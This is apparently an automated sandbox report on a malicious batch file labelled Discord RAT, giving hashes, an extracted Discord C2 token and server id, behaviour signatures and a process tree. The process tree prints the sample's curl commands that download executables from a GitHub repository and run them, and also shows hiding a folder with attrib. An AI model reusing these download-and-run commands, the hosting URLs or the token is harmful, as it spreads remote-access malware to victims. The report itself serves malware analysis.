Analysis
-
max time kernel
213s -
max time network
215s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
29-06-2024 10:53
Static task
static1
Behavioral task
behavioral1
Sample
Sharp CS V1.bat
Resource
win11-20240611-en
Errors
General
-
Target
Sharp CS V1.bat
-
Size
433B
-
MD5
79f4dfedde066329feb0c23b9a95920d
-
SHA1
470bd43b15f11f0583e5357c1f8223ed688559b0
-
SHA256
5051740849cc567c88d930dbff64dbe995f400c68a2f8c25a38ccdd9f2b81359
-
SHA512
a5270495d09ade0056166b26cfb25be796bbf41e96639f3c69011eb1f4433829426f99e0878fcb882e0ccae91e2023cdf01ffb0c5dd22a7ce0f58eb5a09ccd5d
Malware Config
Extracted
discordrat
-
discord_token
MTI0MzQwMDg0MDc3NDE2MDM4NQ.GC8XoW.GV37ZmiRqKTJrla6I_LG3ievGgv1WoBnOGAfMw
-
server_id
1256556741160599562
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
Packages.exeSystem.exepid process 4980 Packages.exe 1776 System.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
Processes:
flow ioc 18 raw.githubusercontent.com 22 discord.com 24 discord.com 11 raw.githubusercontent.com 12 raw.githubusercontent.com 16 discord.com -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Drops file in Program Files directory 2 IoCs
Processes:
curl.execurl.exedescription ioc process File created C:\Program Files\System64\Packages.exe curl.exe File created C:\Program Files\System64\System.exe curl.exe -
Drops file in Windows directory 4 IoCs
Processes:
UserOOBEBroker.exedescription ioc process File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\setupact.log UserOOBEBroker.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
System.exedescription pid process Token: SeDebugPrivilege 1776 System.exe Token: SeShutdownPrivilege 1776 System.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
OpenWith.exeOpenWith.exepid process 2688 OpenWith.exe 2880 OpenWith.exe -
Suspicious use of WriteProcessMemory 45 IoCs
Processes:
cmd.exePackages.execmd.execmd.exedescription pid process target process PID 3092 wrote to memory of 3148 3092 cmd.exe curl.exe PID 3092 wrote to memory of 3148 3092 cmd.exe curl.exe PID 3092 wrote to memory of 4632 3092 cmd.exe curl.exe PID 3092 wrote to memory of 4632 3092 cmd.exe curl.exe PID 3092 wrote to memory of 4980 3092 cmd.exe Packages.exe PID 3092 wrote to memory of 4980 3092 cmd.exe Packages.exe PID 3092 wrote to memory of 4980 3092 cmd.exe Packages.exe PID 3092 wrote to memory of 1776 3092 cmd.exe System.exe PID 3092 wrote to memory of 1776 3092 cmd.exe System.exe PID 4980 wrote to memory of 1136 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 1136 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 1136 4980 Packages.exe cmd.exe PID 1136 wrote to memory of 2536 1136 cmd.exe mode.com PID 1136 wrote to memory of 2536 1136 cmd.exe mode.com PID 1136 wrote to memory of 2536 1136 cmd.exe mode.com PID 4980 wrote to memory of 2660 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 2660 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 2660 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 1780 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 1780 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 1780 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 4712 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 4712 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 4712 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 3356 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 3356 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 3356 4980 Packages.exe cmd.exe PID 3356 wrote to memory of 3128 3356 cmd.exe attrib.exe PID 3356 wrote to memory of 3128 3356 cmd.exe attrib.exe PID 3356 wrote to memory of 3128 3356 cmd.exe attrib.exe PID 4980 wrote to memory of 4752 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 4752 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 4752 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 3876 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 3876 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 3876 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 4792 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 4792 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 4792 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 2784 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 2784 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 2784 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 2064 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 2064 4980 Packages.exe cmd.exe PID 4980 wrote to memory of 2064 4980 Packages.exe cmd.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Sharp CS V1.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl -LJO https://github.com/LongYears9/tools/raw/master/System.exe2⤵
- Drops file in Program Files directory
-
C:\Windows\system32\curl.execurl -LJO https://github.com/LongYears9/tools/raw/master/Packages.exe2⤵
- Drops file in Program Files directory
-
C:\Program Files\System64\Packages.exe"C:\Program Files\System64\Packages.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c mode con:cols=0120 lines=00303⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mode.commode con:cols=0120 lines=00304⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c title Window Title3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\myfiles" mkdir "C:\Users\Admin\AppData\Local\Temp\myfiles"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\wtmpd" mkdir "C:\Users\Admin\AppData\Local\Temp\wtmpd"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\wtmpd3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\wtmpd4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\i6.t3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\i6.bat3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c3⤵
-
C:\Program Files\System64\System.exe"C:\Program Files\System64\System.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵
-
C:\Windows\System32\oobe\UserOOBEBroker.exeC:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding1⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\System64\Packages.exeFilesize
83KB
MD5e155e62ecf5be9131dadecb19213a92a
SHA19ed3d1543b037e901c8870bd360bd5d65e15bda1
SHA25670e2268a76050c6354ad22b0b997a41a48d7148219f6459acd44aadabe3bc500
SHA512fdc30e0fc2d98b27a7fd145247373e5a38856cacaf6f6f66f2716175a4e2ced25f7383a1a42c2c8863a937a345362748575db4a65945e29c3f787975e1402959
-
C:\Program Files\System64\System.exeFilesize
78KB
MD53932b3da37a4b1ac396d52d624fd6c10
SHA192d9336e29373c317ab8c02005e6652f9515c63f
SHA256d5b7c44ebd777e47a77ab3d8749b1c0de91c0c463cc525dd6fd57b7e9604ebab
SHA512d0b43e227232b26032d15bc7430cfd90ef76629ee0064aa61c0585fe6465214801459a2108f5dc16d71dc5d0ee309d2afa28609d1a70f89d031437167b1c33c6
-
C:\Users\Admin\AppData\Local\Temp\i6.batFilesize
173B
MD50f8f70e88009593eefaa155a8e31b1d6
SHA1eabcc3f2135e0919e9456da0a4b1084f3382d4b6
SHA256941c169c07670650fc6c6148c1cae068b69bac209e05010594e164aafc7cdf8b
SHA51294df468b963f3c9d133a25e1ffa57039fac01fe960f0f738552ca6440e6242ff48d0b410fe70dd05a62e4842c925c9f2b0220ca9eb9cb4ff5490ada443c9a750
-
C:\Users\Admin\AppData\Local\Temp\i6.tFilesize
3B
MD5a5ea0ad9260b1550a14cc58d2c39b03d
SHA1f0aedf295071ed34ab8c6a7692223d22b6a19841
SHA256f1b2f662800122bed0ff255693df89c4487fbdcf453d3524a42d4ec20c3d9c04
SHA5127c735c613ece191801114785c1ee26a0485cbf1e8ee2c3b85ba1ad290ef75eec9fede5e1a5dc26d504701f3542e6b6457818f4c1d62448d0db40d5f35c357d74
-
memory/1776-7-0x00007FFC003C3000-0x00007FFC003C5000-memory.dmpFilesize
8KB
-
memory/1776-8-0x0000028167C60000-0x0000028167C78000-memory.dmpFilesize
96KB
-
memory/1776-10-0x000002816A2E0000-0x000002816A4A2000-memory.dmpFilesize
1.8MB
-
memory/1776-11-0x00007FFC003C0000-0x00007FFC00E82000-memory.dmpFilesize
10.8MB
-
memory/1776-18-0x000002816B5B0000-0x000002816BAD8000-memory.dmpFilesize
5.2MB
-
memory/1776-19-0x00007FFC003C0000-0x00007FFC00E82000-memory.dmpFilesize
10.8MB